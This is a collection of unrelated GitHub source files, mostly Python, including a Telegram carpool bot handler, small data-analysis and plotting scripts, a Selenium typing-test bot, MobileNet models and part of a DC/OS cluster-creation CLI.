Get user\n try:\n user: User = User.objects.get(telegram_chat_id=chat_id)\n if not user.approved:\n raise UserNotApproved()\n except User.DoesNotExist:\n # tell it's not registered\n update.message.reply_text(\n \"Você ainda não está cadastrado! 😓 Se deseja se cadastrar, digite `/cadastrar `\"\n )\n return\n except UserNotApproved:\n update.message.reply_text(\"Você ainda não está aprovado. Mas fique de olho! 🧐\")\n return\n\n # Check if there are arguments. There must be 0, 1 or 2 arguments\n if len(context.args) > 2:\n update.message.reply_text(\n \"Você deve usar o comando `/listar_caronas` sem argumentos ou fornecendo a data \"\n + \"da carona e/ou o ID da zona.\" # noqa\n )\n return\n\n # Parse arguments\n date = None\n zone = None\n if len(context.args) > 0:\n # Try to parse useful things from arguments\n for arg in context.args:\n try:\n date_parts = re.match(r\"(\\d{2})/(\\d{2})/(\\d{4})\", arg).groups()\n date: datetime = datetime(\n int(date_parts[2]),\n int(date_parts[1]),\n int(date_parts[0]),\n tzinfo=pytz.timezone(settings.TIME_ZONE),\n )\n except AttributeError:\n pass\n try:\n zone = Zone.objects.get(id=int(arg))\n except Zone.DoesNotExist:\n pass\n except ValueError:\n pass\n # If there is no date and no zone, it's an error\n if date is None and zone is None:\n update.message.reply_text(\n \"Você deve usar o comando `/listar_caronas` sem argumentos ou fornecendo a data \"\n + \"da carona e/ou o ID da zona.\" # noqa\n )\n return\n\n # If there's a date, assure it's in the future\n if date is not None and date < datetime.now(tz=pytz.timezone(settings.TIME_ZONE)):\n update.message.reply_text(\"A data deve ser no futuro!\")\n return\n\n # Start text\n base_text = \"\"\n\n # Get current datetime\n now = datetime.now(tz=pytz.UTC)\n\n # Get rides you're driving\n rides_driving = Ride.objects.filter(car__user=user).filter(start_timestamp__gte=now)\n if rides_driving:\n base_text += \"Você irá dirigir:\\n\\n\"\n for ride in rides_driving:\n base_text += (\n \"=> \"\n + ride.start_timestamp.astimezone( # noqa\n pytz.timezone(settings.TIME_ZONE)\n ).strftime(\"%d/%m/%Y %H:%M\")\n + \"\\n\" # noqa\n )\n base_text += \" * Carro: \" + str(ride.car) + \"\\n\"\n base_text += \" * Vizinhança de destino: \" + ride.destination.name + \"\\n\"\n base_text += \" * Vagas totais: \" + str(ride.passenger_seats) + \"\\n\"\n base_text += (\n \" * Vagas disponíveis: \"\n + str(ride.passenger_seats - ride.passengers.count()) # noqa\n + \"\\n\" # noqa\n )\n base_text += \" * Preço: \" + str(ride.price) + \"\\n\\n\"\n\n # Get other rides\n rides_all = Ride.objects.filter(start_timestamp__gte=now)\n if date:\n rides_all = rides_all.filter(start_timestamp__date=date)\n if zone:\n rides_all = rides_all.filter(destination__zone=zone)\n other_rides_count = 0\n if rides_all:\n for ride in rides_all:\n if ride not in rides_driving:\n if other_rides_count == 0:\n base_text += \"Todas as caronas:\\n\\n\"\n base_text += (\n \"=> \"\n + ride.start_timestamp.astimezone( # noqa\n pytz.timezone(settings.TIME_ZONE)\n ).strftime(\"%d/%m/%Y %H:%M\")\n + \"\\n\" # noqa\n )\n base_text += \" * Carro: \" + str(ride.car) + \"\\n\"\n base_text += (\n \" * Vizinhança de destino: \" + ride.destination.name + \"\\n\"\n )\n base_text += \" * Vagas totais: \" + str(ride.passenger_seats) + \"\\n\"\n base_text += (\n \" * Vagas disponíveis: \"\n + str(ride.passenger_seats - ride.passengers.count()) # noqa\n + \"\\n\" # noqa\n )\n base_text += \" * Preço: \" + str(ride.price) + \"\\n\\n\"\n other_rides_count += 1\n\n # Send message\n if not base_text:\n update.message.reply_text(\"Não existem caronas cadastradas!\")\n else:\n messages = smart_split(base_text, separator=\"\\n\\n\")\n for i, message in enumerate(messages):\n if i == 0:\n update.message.reply_text(message)\n else:\n context.bot.send_message(chat_id=chat_id, text=message)\n","repo_name":"gabriel-milan/comp-soc","sub_path":"carona_parque/bot/handlers/rides/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":9170,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13765559529","text":"# Part. 1\n\n#=======================================\n\n# Import module\n\n# csv -- fileIO operation\n\nimport csv\n\n#=======================================\n\n\n# Part. 2\n\n#=======================================\n\n# Read cwb weather data\n\ncwb_filename = 'sample_input.csv'\n\ndata = []\n\nheader = []\n\nwith open(cwb_filename) as csvfile:\n\n mycsv = csv.DictReader(csvfile)\n\n header = mycsv.fieldnames\n\n for row in mycsv:\n\n data.append(row)\n\n#=======================================\n\n\n# Part. 3\n\n#=======================================\n\n# Analyze data depend on your group and store it to target_data like:\n\n# Retrive all data points which station id is \"C0X260\" as a list.\n\n# target_data = list(filter(lambda item: item['station_id'] == 'C0X260', data))\n\n\n# Retrive ten data points from the beginning.\n\ndef valid(L):\n if (L['station_id'] == 'C0A880' or L['station_id'] == 'C0F9A0' or L['station_id'] == 'C0G640' or L['station_id'] == 'C0R190' or L['station_id'] == 'C0X260'):\n if (float(L['HUMD']) != -99.0 and float(L['HUMD']) != -999.0):\n return 1\n else:\n return 0\n else:\n return 0\n\ntarget_data = [['C0A880', 0], ['C0F9A0', 0],['C0G640', 0], ['C0R190', 0], ['C0X260', 0]]\nsum = {'C0A880':0, 'C0F9A0':0,'C0G640':0, 'C0R190':0, 'C0X260':0}\ntimes = {'C0A880':0, 'C0F9A0':0,'C0G640':0, 'C0R190':0, 'C0X260':0}\nl = [sum, times]\ntemp_data = list(filter(valid, data))\nfor p in temp_data:\n if p['station_id'] in sum:\n k = l[0].get(p['station_id'], 0) + float(p['HUMD'])\n l[0][p['station_id']] = k\n\n\nfor p in target_data:\n if (sum[p[0]] != 0):\n p[1] = sum[p[0]]\n else:\n p[1] = 'None'\n#=======================================\n\n# Part. 4\n#=======================================\n# Print result\nprint(target_data)\n#========================================","repo_name":"HuangWCW315/embedded_python_HW1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8155930215","text":"import numpy as np\r\nimport scipy as sp\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.mlab as mlab\r\n\r\nif __name__ == \"__main__\":\r\n data = np.loadtxt('data/whData.dat',dtype=np.object,comments='#',delimiter=None)\r\n X = np.array(data[:,1].astype(np.float))\r\n\r\n mean = np.mean(X)\r\n std = np.std(X)\r\n\r\n fig = plt.figure()\r\n axs = fig.add_subplot(111)\r\n\r\n x = np.linspace(mean-3.5*std,mean+3.5*std,500)\r\n axs.plot(x,mlab.normpdf(x,mean,std), 'b', label = 'normal')\r\n\r\n X = np.column_stack((X,np.zeros(X.shape[0])))\r\n\r\n axs.plot(X[:,0], X[:,1], marker='o', c='b', label = 'data')\r\n\r\n leg = axs.legend(loc='upper left', shadow=True, fancybox=True, numpoints=1)\r\n leg.get_frame().set_alpha(0.5)\r\n\r\n plt.show()\r\n plt.savefig(\"out/Task2.pdf\", facecolor='w', edgecolor='w',\r\n papertype=None, format='pdf', transparent=False,\r\n bbox_inches='tight', pad_inches=0.1)\r\n plt.close()\r\n","repo_name":"omartrinidad/pattern-recognition-bit","sub_path":"01/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13791579897","text":"from tensorflow.keras.models import load_model\nfrom agent import Agent \nfrom market_env import Market \nimport matplotlib.pyplot as plt\n\ndef main():\n stock_name = \"GSPC_2011-03\"\n model_name = \"model_ep10.h5\"\n\n model = load_model(\"models/\" + model_name)\n window_size = model.layers[0].input.shape.as_list()[1] # 2nd item\n \n agent = Agent(window_size, model_name=model_name)\n market = Market(window_size, stock_name)\n\n state, price_data = market.reset()\n\n for t in range(market.last_data_index):\n action, bought_price = agent.act(state, price_data)\n \n next_state, next_price_data, reward, done = \\\n market.get_next_state_reward(action, bought_price)\n\n state = next_state\n price_data = next_price_data\n \n if done:\n print(\"--------------------------------\")\n print(\"{} total profit: {}\".format(stock_name, agent.get_total_profit()))\n print(\"--------------------------------\")\n\ndef plot_action_profit(data, action_data, profit):\n plot.plot(range(len(data)), data)\n plt.xlabel(\"data\")\n plt.ylabel(\"price\")\n\n buy, sell = False, False\n for d in range(len(data) - 1):\n if action_data == 1: # buy\n buy, = plt.plot(d, data[d], 'g*')\n elif action_data == 2:\n sel, = plt.plot(d, data[d], 'r+')\n if buy and sell:\n plt.legend([buy, sell], [\"Buy\", \"Sell\"])\n plt.title(\"Total Profit: {}\".format(profit))\n plt.savefig(\"buy_sell.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ironmanciti/reiforcement-lecture","sub_path":"sec11_DQN_stock_trading/evaluate_app.py","file_name":"evaluate_app.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26585991930","text":"import numpy as np\nimport scipy as sp\n\n\nimport matplotlib.pyplot as plt\n\nimport os\n\ndef NormalPdf(x,miu,sigma):\n para1 = 1/ (2.0*np.pi)**0.5 / sigma\n para2 = -((x-miu)*(x-miu)/2/sigma/sigma)\n return para1 * np.exp(para2)\n\ndef EvaluationFunction(pose,uwb_data,beaconset,sigma,z_offset,save_file_name):\n the_range = 20 * sigma\n r_k = 5.0\n plot_pose = [the_range*r_k,the_range*r_k]\n\n\n out_matrix = np.zeros([int(the_range*2*r_k),int(the_range*2*r_k)])\n print(range(out_matrix.shape[0]))\n for i in range(out_matrix.shape[0]):\n for j in range(out_matrix.shape[1]):\n tx = float(i) / r_k - the_range + pose[0]\n ty = float(j) / r_k -the_range +pose[1]\n\n score = 1.0\n for k in range(beaconset.shape[0]):\n # print(\"k:\",k)\n dist = np.linalg.norm([tx,ty,z_offset]-beaconset[k,:])\n score *= (NormalPdf(dist,uwb_data[k],sigma)+1e-5)\n out_matrix[i,j] = np.log(score)\n\n plt.figure(2)\n plt.contourf(out_matrix.transpose())\n plt.plot(plot_pose[0],plot_pose[1],'Dr')\n # plt.xlim(-)\n # plt.xticks([-20*sigma,20*sigma],[r'%f',r'%f'])\n # plt.xticks([])\n plt.xlabel('X/m')\n plt.ylabel('Y/m')\n show_offset = out_matrix.shape[0] / 4\n sigma = sigma / 4.0\n plt.xticks([0, show_offset, show_offset * 2, show_offset * 3, show_offset * 4],\n [str(-sigma * 20), str(-sigma * 10.0), 0.0, str(sigma * 10.0), str(sigma * 20.0)])\n plt.yticks([0, show_offset, show_offset * 2, show_offset * 3, show_offset * 4],\n [str(-sigma * 20), str(-sigma * 10.0), 0.0, str(sigma * 10.0), str(sigma * 20.0)])\n plt.savefig(save_file_name)\n # plt.show()\n # plt.plot()\n return out_matrix\n\n\n\nif __name__ == '__main__':\n\n dir_name = '/home/steve/locate/'\n z_offset = 1.8\n beaconset = np.loadtxt(dir_name+'5beaconset.data')\n uwbdata = np.loadtxt(dir_name+'5UwbData.data')\n real_pose = np.loadtxt(dir_name+'5UwbRealPose.data.csv',delimiter=',')\n\n save_dir = '/home/steve/locate/SaveProb'\n # if not os.listdir(save_dir):\n # print(\"error\")\n # if(os.ch)\n # os.mkdir(save_dir)\n\n print(real_pose.shape,uwbdata.shape)\n\n # plot_index = 227\n # m = EvaluationFunction(real_pose[plot_index,:],uwbdata[plot_index,:],beaconset,2.0,z_offset)\n print(beaconset.shape)\n print(beaconset)\n for i in range(uwbdata.shape[0]):\n EvaluationFunction(real_pose[i,:2],\n uwbdata[i,:],\n beaconset,\n 0.5,\n z_offset,\n save_dir+\"/{0}.jpg\".format(i))\n\n\n\n\n\n","repo_name":"wystephen/QuickFusing","sub_path":"ResultData/PlotProb.py","file_name":"PlotProb.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"11082375838","text":"from selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys\nimport constants\n\n# main bot class\nclass TypingBot:\n def __init__(self):\n # neglect warnings and certificate errors to clean up terminal\n options = webdriver.ChromeOptions()\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--ignore-ssl-errors')\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n # initialize chrome driver\n self.driver = webdriver.Chrome(options=options)\n # navigate to 10fastfingers\n self.driver.get(\"https://10fastfingers.com/typing-test/english\")\n\n # set window size, close all popups \n def initialize(self):\n self.driver.set_window_size(1024, 600)\n self.driver.maximize_window()\n sleep(2)\n self.driver.find_element_by_xpath(\n '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]').click()\n sleep(5)\n try:\n self.driver.find_element_by_xpath(\n '//*[@id=\"fs-slot-footer-wrapper\"]/button').click()\n self.driver.find_element_by_xpath('//*[@id=\"Layer_1\"]').click()\n except:\n sleep(5)\n self.driver.find_element_by_xpath(\n '//*[@id=\"fs-slot-footer-wrapper\"]/button').click()\n self.driver.find_element_by_xpath('//*[@id=\"Layer_1\"]').click()\n\n # grab the word list from inner HTML\n def get_word_list(self):\n wlist = self.driver.find_element_by_id(\"wordlist\").get_attribute(\"innerHTML\")\n return wlist.split('|')\n\n def type_words(self, wpm, w_cooldown=0, l_cooldown=0):\n # find and click the input box\n box = self.driver.find_element_by_xpath('//*[@id=\"inputfield\"]')\n box.click()\n # get word list and find the timer\n wlist = self.get_word_list()\n timer = self.driver.find_element_by_id(\"timer\")\n # if theres no letter cooldown input full words \n if l_cooldown > 0:\n i = 0\n # continue typing till the we reach the total number of words given by user or timer hits 0\n while i < wpm and timer.text != \"0:00\":\n print('typing \"' + wlist[i] + '\"...')\n for key in wlist[i]:\n box.send_keys(key)\n sleep(l_cooldown)\n box.send_keys(Keys.SPACE)\n i += 1\n sleep(w_cooldown)\n else:\n i = 0\n while i < wpm and timer.text != \"0:00\":\n print('typing \"' + wlist[i] + '\"...')\n box.send_keys(wlist[i])\n box.send_keys(Keys.SPACE)\n i += 1\n sleep(w_cooldown)\n\nif __name__ == \"__main__\":\n\n print(\"\\n... LOADING ...\")\n\n # initialize bot object\n bot = TypingBot()\n bot.initialize()\n wlist = bot.get_word_list()\n\n # intialize type_words() parameters\n words = len(wlist)\n wc = 0\n lc = 0\n\n # MENU\n print(\"\\n-------- PICK A MODE --------\")\n print(\"1 - Very Slow\")\n print(\"2 - Slow\")\n print(\"3 - Medium\")\n print(\"4 - Fast\")\n print(\"5 - Very Fast\")\n print(\"6 - Ultra\")\n print(\"7 - Custom\")\n print(\"8 - Exit\")\n res = \"\"\n res = input(\"Enter your choice (1-8): \")\n while res not in \"12345678\":\n res = input(\"Please enter a valid choice (1-8): \")\n\n if res == \"1\":\n print(\"\\n-------- MODE: VERY SLOW --------\")\n lc = constants.VS_LC\n wc = constants.VS_WC\n elif res == \"2\":\n print(\"\\n-------- MODE: SLOW --------\")\n lc = constants.S_LC\n wc = constants.S_WC\n elif res == \"3\":\n print(\"\\n-------- MODE: MEDIUM --------\")\n lc = constants.M_LC\n wc = constants.M_WC\n elif res == \"4\":\n print(\"\\n-------- MODE: FAST --------\")\n lc = constants.F_LC\n wc = constants.F_WC\n elif res == \"5\":\n print(\"\\n-------- MODE: VERY FAST --------\")\n lc = constants.VF_LC\n wc = constants.VF_WC\n elif res == \"6\":\n print(\"\\n-------- MODE: ULTRA --------\")\n lc = constants.U_LC\n wc = constants.U_WC\n elif res == \"7\":\n print(\"\\n-------- MODE: CUSTOM --------\")\n words = input(\"Number of words to type [enter max for maximum]: \")\n if words == \"max\":\n words = len(wlist)\n else:\n words = int(words)\n lc = input(\"Letter Cooldown [enter min for minimum]: \")\n if lc == \"min\":\n lc = 0\n else:\n lc = float(lc)\n wc = input(\"Word Cooldown [enter min for minimum]: \")\n if wc == \"min\":\n wc = 0\n else:\n wc = float(wc)\n elif res == \"8\":\n bot.driver.close()\n exit()\n\n # begin the test with given arguements\n input(\"\\nPress any key to begin...\")\n bot.type_words(words, wc, lc)\n\n print(\"\\n-------- END --------\")\n","repo_name":"maazh10/typingtest-bot","sub_path":"fast_fingers.py","file_name":"fast_fingers.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5643421794","text":"import subprocess\nfrom time import sleep\n\n\ndef run_rtsp_server():\n run_command = ['./rtsp-server/rtsp-simple-server', './rtsp-server/rtsp-simple-server.yml']\n server_uid = subprocess.Popen(run_command)\n try:\n while True:\n if server_uid.poll() is not None:\n server_uid = subprocess.Popen(run_command)\n sleep(2)\n except KeyboardInterrupt:\n server_uid.terminate()\n\n\nif __name__ == '__main__':\n run_rtsp_server()\n","repo_name":"Xargeras/multistreamer","sub_path":"scripts/run_rtsp_server.py","file_name":"run_rtsp_server.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73623289080","text":"# Declarando uma função matemática hipotética (nesse exemplo x**3 + y**2)\r\ndef func (x=None, y=None):\r\n \"\"\"\r\n Recebe: x e y\r\n Retorna: x**2 + y**2\r\n \"\"\"\r\n try:\r\n return x**2 + y**2\r\n except:\r\n print('Houve alguma falha no cálculo de função')\r\n return None\r\n\r\n# Declaração da função 'radial_dir' que fará o trabalho sujo para nós\r\ndef radial_dir(pos_init, p=0.1, ob='mini'):\r\n \"\"\"\r\n Recebe: (1) posição inicial = tupla com x e y \r\n (2) tamanho dos passos radiais = float \r\n (3) função objetiva\r\n (4) objetivo sendo 'maxi' ou 'mini'\r\n Processa: 8 vizinhanças na redondeza da pos_init\r\n Retorna: tupla com uma tuple dos pares da menor posição em relação à pos_init e uma flag \r\n 'eh_minimo' que aponta se chegou ao mínimo possível ou ainda não\r\n \"\"\"\r\n\r\n eh_minimo = False\r\n\r\n # Valida se a tupla possui dois argumentos, a coordenada X e a coordenada Y\r\n if (len(pos_init) != 2):\r\n print('Argumentos inválidos.')\r\n return False\r\n \r\n # Atribui as coordenadas às variáveis x0 e y0\r\n x0 = pos_init[0]\r\n y0 = pos_init[1]\r\n\r\n # Crio um dicionário para mapear os deltas para cada coordenada da redondeza.\r\n # Minha estratégia foi colocar os deltas como keys e as coordenadas como values.\r\n # Isso vai simplifcar a análise mais a frente.\r\n \r\n dicti = {}\r\n\r\n try:\r\n \r\n # V1\r\n dicti[func(x0, y0) - func(x0, y0+p)] = (x0, y0+p)\r\n # V2\r\n dicti[func(x0, y0) - func(x0 + p/(2**(0.5)), y0 + p/(2**(0.5)))] = (x0 + p/(2**(0.5)), y0 + p/(2**(0.5)))\r\n # V3\r\n dicti[func(x0, y0) - func(x0 + p, y0)] = (x0 + p, y0)\r\n # V4\r\n dicti[func(x0, y0) - func(x0 + p/(2**(0.5)), y0 - p/(2**(0.5)))] = (x0 + p/(2**(0.5)), y0 - p/(2**(0.5)))\r\n # V5\r\n dicti[func(x0, y0) - func(x0 , y0-p)] = (x0 , y0-p)\r\n # V6\r\n dicti[func(x0, y0) - func(x0 - p/(2**(0.5)), y0 - p/(2**(0.5)))] = (x0 - p/(2**(0.5)), y0 - p/(2**(0.5)))\r\n # V7\r\n dicti[func(x0, y0) - func(x0 - p, y0)] = (x0 - p, y0)\r\n # V8\r\n dicti[func(x0, y0) - func(x0 - p/(2**(0.5)), y0 + p/(2**(0.5)))] = (x0 - p/(2**(0.5)), y0 + p/(2**(0.5)))\r\n\r\n except:\r\n print('Houve alguma falha na construção do dicionário.')\r\n\r\n try:\r\n # Vamos abordar primeiro a minimização. Nesse caso, buscaremos ponto cujo delta \r\n # entre (posição atual) - (posição calculada) seja o maior possível.\r\n # Caso não haja nenhum delta positivo, nesse caso, o ponto atual é o ponto ótimo.\r\n if (ob == 'mini'):\r\n if(max(dicti.keys()) <= 0):\r\n print('Ponto atual é o ótimo')\r\n print((x0, y0))\r\n eh_minimo = True\r\n return ((x0, y0), eh_minimo)\r\n else:\r\n print('Seguem coordenadas para minimização')\r\n print(dicti[max(dicti.keys())])\r\n return (dicti[max(dicti.keys())], eh_minimo )\r\n\r\n # Vamos abordar agora a maximização. Nesse caso, buscaremos ponto cujo delta \r\n # entre (posição atual) - (posição calculada) seja o menor possível.\r\n # Caso não haja nenhum delta negativo, nesse caso, o ponto atual é o ponto ótimo.\r\n \r\n elif(ob == 'maxi'):\r\n if(min(dicti.keys()) >= 0):\r\n print('Ponto atual é o ótimo')\r\n print((x0, y0))\r\n eh_minimo = True\r\n return ((x0, y0), eh_minimo)\r\n else:\r\n print('Seguem coordenadas para maximixação')\r\n print(dicti[min(dicti.keys())])\r\n return (dicti[min(dicti.keys())], eh_minimo)\r\n\r\n except:\r\n print('Houve alguma falha no retorno da posição.')\r\n\r\n\r\n# Defino os parâmetros iniciais\r\npasso = 0.7\r\npos_init = (7, 7)\r\nob = 'mini'\r\nrodadas = list(range(40))\r\n\r\n# Executo o pragama 'r' vezes consecutivas perseguindo o objetivo de otimização\r\n# Além disso, farei registro das coordenadas para plotar o caminho percorrido\r\neixoX, eixoY = [pos_init[0]], [pos_init[1]]\r\nfor r in rodadas:\r\n pos_init, flag = radial_dir(pos_init, p=passo, ob=ob)\r\n eixoX.append(pos_init[0])\r\n eixoY.append(pos_init[1])\r\n if (flag):\r\n print('Para os parâmetros definidos, fizemos nosso melhor!')\r\n break\r\n\r\n# Plotando os resultados\r\nimport matplotlib.pyplot as plt\r\nplt.figure('Path')\r\nplt.title('Path to Glory')\r\nplt.plot(eixoX, eixoY, '--', color='blue')\r\nplt.show()","repo_name":"FeMaffezzolli/python_optmizer","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9126885715","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torchvision.models import mobilenet_v3_small, mobilenet_v3_large, MobileNet_V3_Small_Weights, MobileNet_V3_Large_Weights\n\nfrom sam.util import ConfigType\n\n__all__ = [\"MobileNetV3\", \"MobileNetV2\"]\n\nclass MobileNetV3(nn.Module):\n def __init__(self, config: ConfigType):\n super().__init__()\n\n pretrained = config.model.mobile_net_pretrained\n if config.model.mobile_net_small:\n self.model = mobilenet_v3_small(weights=MobileNet_V3_Small_Weights.IMAGENET1K_V1 if pretrained else None)\n else:\n self.model = mobilenet_v3_large(weights=MobileNet_V3_Large_Weights.IMAGENET1K_V2 if pretrained else None)\n \n num_outputs = config.model.num_outputs\n last_layer = self.model.classifier[-1]\n if last_layer.out_features != num_outputs:\n self.model.classifier[-1] = nn.Linear(last_layer.in_features, num_outputs)\n nn.init.normal_(self.model.classifier[-1].weight, 0, 0.01)\n nn.init.zeros_(self.model.classifier[-1].bias)\n\n def forward(self, x):\n return self.model(x)\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Block(nn.Module):\n '''expand + depthwise + pointwise'''\n def __init__(self, in_planes, out_planes, expansion, stride):\n super(Block, self).__init__()\n self.stride = stride\n\n planes = expansion * in_planes\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, groups=planes, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn3 = nn.BatchNorm2d(out_planes)\n\n self.shortcut = nn.Sequential()\n if stride == 1 and in_planes != out_planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(out_planes),\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out = out + self.shortcut(x) if self.stride==1 else out\n return out\n\n\nclass MobileNetV2(nn.Module):\n # (expansion, out_planes, num_blocks, stride)\n cfg = [(1, 16, 1, 1),\n (6, 24, 2, 1), # NOTE: change stride 2 -> 1 for CIFAR10\n (6, 32, 3, 2),\n (6, 64, 4, 2),\n (6, 96, 3, 1),\n (6, 160, 3, 2),\n (6, 320, 1, 1)]\n\n def __init__(self, config: ConfigType):\n super(MobileNetV2, self).__init__()\n # NOTE: change conv1 stride 2 -> 1 for CIFAR10\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(32)\n self.layers = self._make_layers(in_planes=32)\n self.conv2 = nn.Conv2d(320, 1280, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn2 = nn.BatchNorm2d(1280)\n self.linear = nn.Linear(1280, config.model.num_outputs)\n\n def _make_layers(self, in_planes):\n layers = []\n for expansion, out_planes, num_blocks, stride in self.cfg:\n strides = [stride] + [1]*(num_blocks-1)\n for stride in strides:\n layers.append(Block(in_planes, out_planes, expansion, stride))\n in_planes = out_planes\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layers(out)\n out = F.relu(self.bn2(self.conv2(out)))\n # NOTE: change pooling kernel_size 7 -> 4 for CIFAR10\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n","repo_name":"Kausta/R252_SAM","sub_path":"sam/models/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"1661312729","text":"\"\"\"\nTools for creating a DC/OS cluster.\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple\n\nimport click\nfrom docker.models.networks import Network\nfrom docker.types import Mount\n\nfrom dcos_e2e.backends import Docker\nfrom dcos_e2e.distributions import Distribution\nfrom dcos_e2e.docker_storage_drivers import DockerStorageDriver\nfrom dcos_e2e.docker_versions import DockerVersion\nfrom dcos_e2e.node import Transport\nfrom dcos_e2e_cli.common.arguments import installer_path_argument\nfrom dcos_e2e_cli.common.create import CREATE_HELP, create_cluster, get_config\nfrom dcos_e2e_cli.common.credentials import add_authorized_key\nfrom dcos_e2e_cli.common.doctor import get_doctor_message\nfrom dcos_e2e_cli.common.install import (\n cluster_install_dcos_from_path,\n run_post_install_steps,\n)\nfrom dcos_e2e_cli.common.options import (\n cluster_id_option,\n copy_to_master_option,\n enable_spinner_option,\n extra_config_option,\n license_key_option,\n security_mode_option,\n variant_option,\n verbosity_option,\n)\nfrom dcos_e2e_cli.common.options.cluster_size import (\n agents_option,\n masters_option,\n public_agents_option,\n)\nfrom dcos_e2e_cli.common.options.genconf_dir import genconf_dir_option\nfrom dcos_e2e_cli.common.utils import (\n check_cluster_id_unique,\n command_path,\n write_key_pair,\n)\nfrom dcos_e2e_cli.common.variants import get_install_variant\nfrom dcos_e2e_cli.common.workspaces import workspace_dir_option\n\nfrom ._cgroup_mount_option import cgroup_mount_option\nfrom ._common import (\n CLUSTER_ID_LABEL_KEY,\n NODE_TYPE_AGENT_LABEL_VALUE,\n NODE_TYPE_LABEL_KEY,\n NODE_TYPE_MASTER_LABEL_VALUE,\n NODE_TYPE_PUBLIC_AGENT_LABEL_VALUE,\n WORKSPACE_DIR_LABEL_KEY,\n ClusterContainers,\n existing_cluster_ids,\n)\nfrom ._docker_network import docker_network_option\nfrom ._docker_storage_driver import docker_storage_driver_option\nfrom ._docker_version import docker_version_option\nfrom ._linux_distribution import linux_distribution_option\nfrom ._options import node_transport_option, wait_for_dcos_option\nfrom ._port_mapping import one_master_host_port_map_option\nfrom ._volume_options import (\n AGENT_VOLUME_OPTION,\n MASTER_VOLUME_OPTION,\n PUBLIC_AGENT_VOLUME_OPTION,\n VOLUME_OPTION,\n)\nfrom .doctor import doctor\nfrom .wait import wait\n\n\n@click.command('create', help=CREATE_HELP)\n@installer_path_argument\n@docker_version_option\n@linux_distribution_option\n@docker_storage_driver_option\n@cgroup_mount_option\n@masters_option\n@agents_option\n@public_agents_option\n@extra_config_option\n@security_mode_option\n@cluster_id_option\n@license_key_option\n@genconf_dir_option\n@copy_to_master_option\n@VOLUME_OPTION\n@MASTER_VOLUME_OPTION\n@AGENT_VOLUME_OPTION\n@PUBLIC_AGENT_VOLUME_OPTION\n@workspace_dir_option\n@variant_option\n@wait_for_dcos_option\n@docker_network_option\n@node_transport_option\n@one_master_host_port_map_option\n@verbosity_option\n@enable_spinner_option\n@click.pass_context\ndef create(\n ctx: click.core.Context,\n agents: int,\n installer: Path,\n cluster_id: str,\n docker_storage_driver: Optional[DockerStorageDriver],\n docker_version: DockerVersion,\n extra_config: Dict[str, Any],\n linux_distribution: Distribution,\n masters: int,\n public_agents: int,\n license_key: Optional[Path],\n security_mode: Optional[str],\n copy_to_master: List[Tuple[Path, Path]],\n files_to_copy_to_genconf_dir: List[Tuple[Path, Path]],\n workspace_dir: Path,\n custom_volume: List[Mount],\n custom_master_volume: List[Mount],\n custom_agent_volume: List[Mount],\n custom_public_agent_volume: List[Mount],\n variant: str,\n transport: Transport,\n wait_for_dcos: bool,\n network: Network,\n one_master_host_port_map: Dict[str, int],\n mount_sys_fs_cgroup: bool,\n enable_spinner: bool,\n) -> None:\n \"\"\"\n Create a DC/OS cluster.\n \"\"\"\n check_cluster_id_unique(\n new_cluster_id=cluster_id,\n existing_cluster_ids=existing_cluster_ids(),\n )\n\n http_checks = bool(transport == Transport.SSH)\n wait_command_name = command_path(sibling_ctx=ctx, command=wait)\n doctor_command_name = command_path(sibling_ctx=ctx, command=doctor)\n doctor_message = 